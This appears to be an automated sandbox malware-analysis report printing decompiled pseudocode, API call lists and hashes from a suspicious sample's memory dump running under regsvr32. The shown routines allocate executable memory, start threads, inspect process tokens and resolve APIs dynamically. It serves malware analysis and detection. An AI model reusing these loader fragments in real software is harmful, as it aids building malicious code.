                                                                                                                                                                                              0x042a656e
                                                                                                                                                                                              0x042a6573
                                                                                                                                                                                              0x042a6576
                                                                                                                                                                                              0x042a6578
                                                                                                                                                                                              0x042a6581
                                                                                                                                                                                              0x042a658c
                                                                                                                                                                                              0x042a6591
                                                                                                                                                                                              0x042a659c
                                                                                                                                                                                              0x042a65a1
                                                                                                                                                                                              0x042a65ab
                                                                                                                                                                                              0x042a65ab
                                                                                                                                                                                              0x042a65c5
                                                                                                                                                                                              0x042a65c8
                                                                                                                                                                                              0x042a65cb
                                                                                                                                                                                              0x042a65d0
                                                                                                                                                                                              0x042a65d2
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042a65d2
                                                                                                                                                                                              0x042a6550
                                                                                                                                                                                              0x00000000

                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 042A8BC9: HeapCreate.KERNELBASE(00000000,00096000,00000000,042A6502), ref: 042A8BD2
                                                                                                                                                                                                • Part of subcall function 042AF05C: GetModuleHandleA.KERNEL32(00000000,?,?,?,042BCA50,?,042A652B,?), ref: 042AF07E
                                                                                                                                                                                              • GetFileAttributesW.KERNELBASE(00000000), ref: 042A6541
                                                                                                                                                                                              • CreateThread.KERNELBASE(00000000,00000000,042A6298,00000000,00000000,?), ref: 042A65C8
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001C.00000002.673063332.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_28_2_42a0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Create$AttributesFileHandleHeapModuleThread
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 607385197-0
                                                                                                                                                                                              • Opcode ID: 889e4f299648ebc242b5c062c6859663f0534a75eb05743adaccfff3b284a9aa
                                                                                                                                                                                              • Instruction ID: f232d8d60250563ccbf50d1e7ae658992853579e35e43eac28d656ebe05a0e23
                                                                                                                                                                                              • Opcode Fuzzy Hash: 889e4f299648ebc242b5c062c6859663f0534a75eb05743adaccfff3b284a9aa
                                                                                                                                                                                              • Instruction Fuzzy Hash: 1F21A6B0720205EBEB04FF78E909A9D37D8DF04354F05C529EA99CA180DF78E590CBA1
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0082F9D0 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46memoryCOMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 420 82f9d0-82fa1b call 82fdc0 423 82fa2a-82fa5a call 82f7a0 VirtualAlloc 420->423 424 82fa1d-82fa27 call 82fdc0 420->424 424->423
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0082FA54
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001C.00000002.672779315.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_28_2_810000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AllocVirtual
                                                                                                                                                                                              • String ID: VirtualAlloc
                                                                                                                                                                                              • API String ID: 4275171209-164498762
                                                                                                                                                                                              • Opcode ID: 0a7b03ca3328d8d5ce176abfae7b90b625f1715e0bfc58100f669a5480e56ec7
                                                                                                                                                                                              • Instruction ID: d2b75c6d54729c2b8e80c4b03de1904733b4b79b4340669d571eb8d62b993c8b
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0a7b03ca3328d8d5ce176abfae7b90b625f1715e0bfc58100f669a5480e56ec7
                                                                                                                                                                                              • Instruction Fuzzy Hash: 5C114260D082C9DEEF01D7E89409BEFBFB55F11708F0440A8DA446B282D2BA5758C7B6
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 042AF05C Relevance: 3.0, APIs: 2, Instructions: 35libraryCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 47%
                                                                                                                                                                                              			E042AF05C(void* __ecx, void* __edx, intOrPtr _a4) {
				char _v8;
				char _t5;
				struct HINSTANCE__* _t7;
				void* _t10;
				void* _t12;
				void* _t22;
				void* _t25;

				_push(__ecx);
				_t12 = __ecx;
				_t22 = __edx;
				_t5 = E042A9DD8(_a4);
				_t25 = 0;
				_v8 = _t5;
				_push(_t5);
				if(_a4 != 0xf43) {
					_t7 = LoadLibraryA(); // executed
				} else {
					_t7 = GetModuleHandleA();
				}
				if(_t7 != 0) {
					_t10 = E042AF011(_t12, _t22, _t7); // executed
					_t25 = _t10;
				}
				E042A8B9C( &_v8);
				return _t25;
			}










                                                                                                                                                                                              0x042af05f
                                                                                                                                                                                              0x042af062
                                                                                                                                                                                              0x042af068
                                                                                                                                                                                              0x042af06a
                                                                                                                                                                                              0x042af06f
                                                                                                                                                                                              0x042af071
                                                                                                                                                                                              0x042af07b
                                                                                                                                                                                              0x042af07c
                                                                                                                                                                                              0x042af08b
                                                                                                                                                                                              0x042af07e
                                                                                                                                                                                              0x042af07e
                                                                                                                                                                                              0x042af07e
                                                                                                                                                                                              0x042af08f
                                                                                                                                                                                              0x042af096
                                                                                                                                                                                              0x042af09c
                                                                                                                                                                                              0x042af09c
                                                                                                                                                                                              0x042af0a1
                                                                                                                                                                                              0x042af0ac

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(00000000,?,?,?,042BCA50,?,042A652B,?), ref: 042AF07E
                                                                                                                                                                                              • LoadLibraryA.KERNELBASE(00000000,?,?,?,042BCA50,?,042A652B,?), ref: 042AF08B
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001C.00000002.673063332.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_28_2_42a0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: HandleLibraryLoadModule
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 4133054770-0
                                                                                                                                                                                              • Opcode ID: ba385203876a1a7c0d6c1b0f937a0720a44826135bc4cb21b602b8806766a62d
                                                                                                                                                                                              • Instruction ID: 85daca316b450ff8bf848031d29b034d26fe34a37d512065a0be4f4d49401f51
                                                                                                                                                                                              • Opcode Fuzzy Hash: ba385203876a1a7c0d6c1b0f937a0720a44826135bc4cb21b602b8806766a62d
                                                                                                                                                                                              • Instruction Fuzzy Hash: 33F0A771310214ABD714ABADF98489AB3ECDF48354711443AFE06D7150EAB4AE8086E0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 042AC8C9 Relevance: 1.6, APIs: 1, Instructions: 82COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 47%
                                                                                                                                                                                              			E042AC8C9(void* __ecx, void* __esi) {
				intOrPtr* _v8;
				char _v12;
				void* _v16;
				char _v20;
				char _v24;
				short _v28;
				char _v32;
				void* _t20;
				intOrPtr* _t21;
				intOrPtr _t29;
				intOrPtr _t31;
				intOrPtr* _t33;
				intOrPtr _t34;
				char _t37;
				union _TOKEN_INFORMATION_CLASS _t44;
				char _t45;
				intOrPtr* _t48;

				_t37 = 0;
				_v28 = 0x500;
				_t45 = 0;
				_v32 = 0;
				_t20 = E042AC79E(__ecx);
				_v16 = _t20;
				if(_t20 != 0) {
					_push( &_v24);
					_t44 = 2;
					_t21 = E042AC7F5(_t44); // executed
					_t48 = _t21;
					_v20 = _t48;
					if(_t48 == 0) {
						L10:
						FindCloseChangeNotification(_v16);
						if(_t48 != 0) {
							E042A8BF4( &_v20, _t37);
						}
						return _t45;
					}
					_push( &_v12);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0x220);
					_push(0x20);
					_push(2);
					_push( &_v32);
					_t29 =  *0x42bf820; // 0x48efaa0
					if( *((intOrPtr*)(_t29 + 0xc))() == 0) {
						goto L10;
					}
					if( *_t48 <= 0) {
						L9:
						_t31 =  *0x42bf820; // 0x48efaa0
						 *((intOrPtr*)(_t31 + 0x10))(_v12);
						_t37 = 0;
						goto L10;
					}
					_t9 = _t48 + 4; // 0x4
					_t33 = _t9;
					_v8 = _t33;
					while(1) {
						_push(_v12);
						_push( *_t33);
						_t34 =  *0x42bf820; // 0x48efaa0
						if( *((intOrPtr*)(_t34 + 0x68))() != 0) {
							break;
						}
						_t37 = _t37 + 1;
						_t33 = _v8 + 8;
						_v8 = _t33;
						if(_t37 <  *_t48) {
							continue;
						}
						goto L9;
					}
					_t45 = 1;
					goto L9;
				}
				return _t20;
			}




















                                                                                                                                                                                              0x042ac8d0
                                                                                                                                                                                              0x042ac8d2
                                                                                                                                                                                              0x042ac8d9
                                                                                                                                                                                              0x042ac8db
                                                                                                                                                                                              0x042ac8de
                                                                                                                                                                                              0x042ac8e3
                                                                                                                                                                                              0x042ac8e8
                                                                                                                                                                                              0x042ac8f2
                                                                                                                                                                                              0x042ac8f5
                                                                                                                                                                                              0x042ac8f8
                                                                                                                                                                                              0x042ac8fd
                                                                                                                                                                                              0x042ac8ff
                                                                                                                                                                                              0x042ac905
                                                                                                                                                                                              0x042ac965
                                                                                                                                                                                              0x042ac96d
                                                                                                                                                                                              0x042ac973
                                                                                                                                                                                              0x042ac97a
                                                                                                                                                                                              0x042ac980
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042ac981
                                                                                                                                                                                              0x042ac90a
                                                                                                                                                                                              0x042ac90b
                                                                                                                                                                                              0x042ac90c
                                                                                                                                                                                              0x042ac90d
                                                                                                                                                                                              0x042ac90e
                                                                                                                                                                                              0x042ac90f
                                                                                                                                                                                              0x042ac910
                                                                                                                                                                                              0x042ac911
                                                                                                                                                                                              0x042ac916
                                                                                                                                                                                              0x042ac918
                                                                                                                                                                                              0x042ac91d
                                                                                                                                                                                              0x042ac91e
                                                                                                                                                                                              0x042ac928
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042ac92c
                                                                                                                                                                                              0x042ac958
                                                                                                                                                                                              0x042ac958
                                                                                                                                                                                              0x042ac960
                                                                                                                                                                                              0x042ac963
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042ac963
                                                                                                                                                                                              0x042ac92e
                                                                                                                                                                                              0x042ac92e
                                                                                                                                                                                              0x042ac931
                                                                                                                                                                                              0x042ac934
                                                                                                                                                                                              0x042ac934
                                                                                                                                                                                              0x042ac937
                                                                                                                                                                                              0x042ac939
                                                                                                                                                                                              0x042ac943
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042ac948
                                                                                                                                                                                              0x042ac949
                                                                                                                                                                                              0x042ac94c
                                                                                                                                                                                              0x042ac951
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042ac953
                                                                                                                                                                                              0x042ac957
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042ac957
                                                                                                                                                                                              0x042ac986

                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 042AC79E: GetCurrentThread.KERNEL32 ref: 042AC7B1
                                                                                                                                                                                                • Part of subcall function 042AC79E: OpenThreadToken.ADVAPI32(00000000,?,?,042AC8E3,00000000,042A0000), ref: 042AC7B8
                                                                                                                                                                                                • Part of subcall function 042AC79E: GetLastError.KERNEL32(?,?,042AC8E3,00000000,042A0000), ref: 042AC7BF
                                                                                                                                                                                                • Part of subcall function 042AC79E: OpenProcessToken.ADVAPI32(00000000,?,?,042AC8E3,00000000,042A0000), ref: 042AC7E4
                                                                                                                                                                                                • Part of subcall function 042AC7F5: GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,00000000,00001644,042A0000,00000000,00000000,?,042AC876,00000000,00000000,?,042AC89F), ref: 042AC810
                                                                                                                                                                                                • Part of subcall function 042AC7F5: GetLastError.KERNEL32(?,042AC876,00000000,00000000,?,042AC89F,00001644,?,042ADFCE), ref: 042AC817
                                                                                                                                                                                              • FindCloseChangeNotification.KERNELBASE(?,00001644,00000000,042A0000), ref: 042AC96D
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001C.00000002.673063332.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_28_2_42a0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Token$ErrorLastOpenThread$ChangeCloseCurrentFindInformationNotificationProcess
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1806447117-0
                                                                                                                                                                                              • Opcode ID: a7a01199a755cf2343f21750f592ba3baa4ff58b3903e668fc09531809b609ed
                                                                                                                                                                                              • Instruction ID: 79f02a75d7f0bbe7aab7fd768d4675def187e6f5f39ad9430f23bccefad89b80
                                                                                                                                                                                              • Opcode Fuzzy Hash: a7a01199a755cf2343f21750f592ba3baa4ff58b3903e668fc09531809b609ed
                                                                                                                                                                                              • Instruction Fuzzy Hash: AF217F32B1020AAFDB10EFAADC85AAEB7F8FF08700F114469E941E7150D730AE148B94
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 042A6298 Relevance: 1.5, APIs: 1, Instructions: 40COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E042A6298(void* __fp0) {
				void* __ecx;
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				intOrPtr _t17;
				intOrPtr _t20;
				void* _t25;
				void* _t27;

				_t32 = __fp0;
				E042A6412();
				GetOEMCP();
				_t13 = E042ADF3D(__fp0); // executed
				 *0x42bf81c = _t13;
				if(_t13 != 0) {
					 *((intOrPtr*)(_t13 + 0xa0)) = 1;
					_t14 =  *0x42bf81c; // 0x48efbe8
					_t2 = _t14 + 0x224; // 0x42a0000
					E042B3BD5( *_t2);
					_t26 =  *0x42bf81c; // 0x48efbe8
					_t25 = _t27;
					__eflags =  *(_t26 + 0x1898) & 0x00010000;
					if(( *(_t26 + 0x1898) & 0x00010000) == 0) {
						_t7 = _t26 + 0x224; // 0x42a0000, executed
						_t26 =  *_t7;
						_t16 = E042AD804( *_t7); // executed
						__eflags = _t16;
						_t17 =  *0x42bf81c; // 0x48efbe8
						if(_t16 != 0) {
							__eflags =  *((intOrPtr*)(_t17 + 0x214)) - 3;
							if( *((intOrPtr*)(_t17 + 0x214)) != 3) {
								L10:
								__eflags = 0;
								return 0;
							}
							L9:
							E042A35A1();
							goto L10;
						}
						 *((intOrPtr*)(_t17 + 0xa4)) = 1;
						L6:
						_t20 =  *0x42bf81c; // 0x48efbe8
						__eflags =  *((intOrPtr*)(_t20 + 0x214)) - 3;
						if(__eflags == 0) {
							goto L9;
						}
						E042A611B(_t25, _t26, __eflags, _t32);
						goto L10;
					}
					 *((intOrPtr*)(_t26 + 0xa4)) = 1;
					goto L6;
				}
				return _t13 + 1;
			}











                                                                                                                                                                                              0x042a6298
                                                                                                                                                                                              0x042a6298
                                                                                                                                                                                              0x042a629d
                                                                                                                                                                                              0x042a62a4
                                                                                                                                                                                              0x042a62a9
                                                                                                                                                                                              0x042a62b1
                                                                                                                                                                                              0x042a62ba
                                                                                                                                                                                              0x042a62c0
                                                                                                                                                                                              0x042a62c5
                                                                                                                                                                                              0x042a62cb
                                                                                                                                                                                              0x042a62d0
                                                                                                                                                                                              0x042a62d6
                                                                                                                                                                                              0x042a62d7
                                                                                                                                                                                              0x042a62e1
                                                                                                                                                                                              0x042a62eb
                                                                                                                                                                                              0x042a62eb
                                                                                                                                                                                              0x042a62f1
                                                                                                                                                                                              0x042a62f6
                                                                                                                                                                                              0x042a62f8
                                                                                                                                                                                              0x042a62fd
                                                                                                                                                                                              0x042a631a
                                                                                                                                                                                              0x042a6321
                                                                                                                                                                                              0x042a6328
                                                                                                                                                                                              0x042a6328
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042a632a
                                                                                                                                                                                              0x042a6323
                                                                                                                                                                                              0x042a6323
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042a6323
                                                                                                                                                                                              0x042a62ff
                                                                                                                                                                                              0x042a6305
                                                                                                                                                                                              0x042a6305
                                                                                                                                                                                              0x042a630a
                                                                                                                                                                                              0x042a6311
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042a6313
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042a6313
                                                                                                                                                                                              0x042a62e3
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042a62e3
                                                                                                                                                                                              0x00000000

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetOEMCP.KERNEL32 ref: 042A629D
                                                                                                                                                                                                • Part of subcall function 042ADF3D: GetCurrentProcessId.KERNEL32 ref: 042ADF64
                                                                                                                                                                                                • Part of subcall function 042ADF3D: GetLastError.KERNEL32 ref: 042AE05E
                                                                                                                                                                                                • Part of subcall function 042ADF3D: GetSystemMetrics.USER32(00001000), ref: 042AE06E
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001C.00000002.673063332.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_28_2_42a0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CurrentErrorLastMetricsProcessSystem
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1196160345-0
                                                                                                                                                                                              • Opcode ID: 47a9523e393e69138952ffc1ae5d40fd9602cc6906de25e0c07141534fcad42c
                                                                                                                                                                                              • Instruction ID: e92bb5a93e14fb679eeb3bb082a79c3f5e7df856ea4e03354a60d14445bc3048
                                                                                                                                                                                              • Opcode Fuzzy Hash: 47a9523e393e69138952ffc1ae5d40fd9602cc6906de25e0c07141534fcad42c
                                                                                                                                                                                              • Instruction Fuzzy Hash: BA015E717342028FD314EF68A948AE5B7E0EB0A714F0942B5E884CA111C77469A7CB91
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 042AC879 Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E042AC879(void* __ecx) {
				signed int _v8;
				intOrPtr _t12;
				void* _t13;
				void* _t14;
				void* _t17;
				intOrPtr _t18;
				void* _t23;

				_v8 = _v8 & 0x00000000;
				_t12 =  *0x42bf820; // 0x48efaa0
				_t13 =  *((intOrPtr*)(_t12 + 0x70))(__ecx, 8,  &_v8, __ecx);
				if(_t13 != 0) {
					_t14 = E042AC862(); // executed
					_t23 = _t14;
					if(_t23 != 0) {
						FindCloseChangeNotification(_v8);
						_t17 = _t23;
					} else {
						if(_v8 != _t14) {
							_t18 =  *0x42bf818; // 0x48ef8b0
							 *((intOrPtr*)(_t18 + 0x30))(_v8);
						}
						_t17 = 0;
					}
					return _t17;
				} else {
					return _t13;
				}
			}










                                                                                                                                                                                              0x042ac87d
                                                                                                                                                                                              0x042ac885
                                                                                                                                                                                              0x042ac88d
                                                                                                                                                                                              0x042ac892
                                                                                                                                                                                              0x042ac89a
                                                                                                                                                                                              0x042ac89f
                                                                                                                                                                                              0x042ac8a3
                                                                                                                                                                                              0x042ac8c1
                                                                                                                                                                                              0x042ac8c4
                                                                                                                                                                                              0x042ac8a5
                                                                                                                                                                                              0x042ac8a8
                                                                                                                                                                                              0x042ac8aa
                                                                                                                                                                                              0x042ac8b2
                                                                                                                                                                                              0x042ac8b2
                                                                                                                                                                                              0x042ac8b5
                                                                                                                                                                                              0x042ac8b5
                                                                                                                                                                                              0x042ac8c8
                                                                                                                                                                                              0x042ac895
                                                                                                                                                                                              0x042ac895
                                                                                                                                                                                              0x042ac895

                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001C.00000002.673063332.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_28_2_42a0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: e9fb4e8a3b556cdcdbbb1ebdee866d3d5994cd00579fc49bc47f34336bb4222d
                                                                                                                                                                                              • Instruction ID: 526492b1e7faa48f45102054494e2116a2e797a07cb0daf8cb83426ef673ac28
                                                                                                                                                                                              • Opcode Fuzzy Hash: e9fb4e8a3b556cdcdbbb1ebdee866d3d5994cd00579fc49bc47f34336bb4222d
                                                                                                                                                                                              • Instruction Fuzzy Hash: C6F03A32B20105EFEB12DBAAE909A9D73F8FF08745F0141A4E941E7150DB34EE10DB91
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 042A632E Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E042A632E() {
				intOrPtr _t3;

				_t3 =  *0x42bf818; // 0x48ef8b0
				 *((intOrPtr*)(_t3 + 0x2c))( *0x42bf83c, 0xffffffff);
				ExitProcess(0);
			}




                                                                                                                                                                                              0x042a632e
                                                                                                                                                                                              0x042a633b
                                                                                                                                                                                              0x042a6345

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • ExitProcess.KERNEL32(00000000), ref: 042A6345
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001C.00000002.673063332.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_28_2_42a0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExitProcess
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 621844428-0
                                                                                                                                                                                              • Opcode ID: 9fbe48543bbb328739cab186c3177009cc84be252897381a42ad5f25a26f5d0b
                                                                                                                                                                                              • Instruction ID: 2e386bc4b95b043163e818dbf05bab01b7bc036f77b71db25d8173c43495dbb8
                                                                                                                                                                                              • Opcode Fuzzy Hash: 9fbe48543bbb328739cab186c3177009cc84be252897381a42ad5f25a26f5d0b
                                                                                                                                                                                              • Instruction Fuzzy Hash: 9AC002713140109FC7409B68FE4DF4437E0EB0D322F12C7A0F569DA1E5CB3499819B80
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 042A8BDE Relevance: 1.5, APIs: 1, Instructions: 8memoryCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E042A8BDE(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0x42bf900, 8, _a4); // executed
				return _t2;
			}




                                                                                                                                                                                              0x042a8bec
                                                                                                                                                                                              0x042a8bf3

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000008,?,?,042A959D,00000100,?,042A6507), ref: 042A8BEC
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001C.00000002.673063332.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_28_2_42a0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                                              • Opcode ID: 18da0c6038c4ac6a82bea823b0c7988bd1949d35eedcb9de10724db368a52ca8
                                                                                                                                                                                              • Instruction ID: 7488b7ded20e4bbe346130b2ffa5542001697988298f99de360a1314890182bd
                                                                                                                                                                                              • Opcode Fuzzy Hash: 18da0c6038c4ac6a82bea823b0c7988bd1949d35eedcb9de10724db368a52ca8
                                                                                                                                                                                              • Instruction Fuzzy Hash: CCB09231280A0CBBDB011AADFC09A843F29F715755F004010F70C44460CB6668609BC4
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 042ADA57 Relevance: 1.5, APIs: 1, Instructions: 7threadCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 58%
                                                                                                                                                                                              			E042ADA57(void* __ecx) {
				signed int _t4;

				_t4 = ResumeThread( *(__ecx + 4));
				asm("sbb eax, eax");
				return  ~_t4 & 0x00000001;
			}




                                                                                                                                                                                              0x042ada5f
                                                                                                                                                                                              0x042ada67
                                                                                                                                                                                              0x042ada6c

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • ResumeThread.KERNELBASE(?,042AD8C2,?,?,00000001), ref: 042ADA5F
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001C.00000002.673063332.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_28_2_42a0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ResumeThread
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 947044025-0
                                                                                                                                                                                              • Opcode ID: 0c9e770384bf7c531b23f4d461c8b89c94021fb87f062217cc748360d7251566
                                                                                                                                                                                              • Instruction ID: e7bf7cdada17802bc3449363e2c268e591e7f9d64329db5a45298186a66f5274
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0c9e770384bf7c531b23f4d461c8b89c94021fb87f062217cc748360d7251566
                                                                                                                                                                                              • Instruction Fuzzy Hash: B8B092323A00019BCB004B78FD0B9903BE0FB5A706799C2F0A045C6061C32EC8868A80
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 042A8BC9 Relevance: 1.5, APIs: 1, Instructions: 6memoryCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E042A8BC9() {
				void* _t1;

				_t1 = HeapCreate(0, 0x96000, 0); // executed
				 *0x42bf900 = _t1;
				return _t1;
			}




                                                                                                                                                                                              0x042a8bd2
                                                                                                                                                                                              0x042a8bd8
                                                                                                                                                                                              0x042a8bdd

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • HeapCreate.KERNELBASE(00000000,00096000,00000000,042A6502), ref: 042A8BD2
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001C.00000002.673063332.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_28_2_42a0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CreateHeap
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 10892065-0
                                                                                                                                                                                              • Opcode ID: 87011f47f769d9483916ac878f5a3097de268c5c8c173a9b90e104cc08f905ad
                                                                                                                                                                                              • Instruction ID: 2eb4a29fcc862135e97c3a74320027e2604efa91569812e38fc6c4b6d1b7c780
                                                                                                                                                                                              • Opcode Fuzzy Hash: 87011f47f769d9483916ac878f5a3097de268c5c8c173a9b90e104cc08f905ad
                                                                                                                                                                                              • Instruction Fuzzy Hash: 2BB012B038570066E6100B287C4EB003510E380B02F100000F705D81C0D7A434409548
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 042ADA6D Relevance: 1.3, APIs: 1, Instructions: 50sleepCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 91%
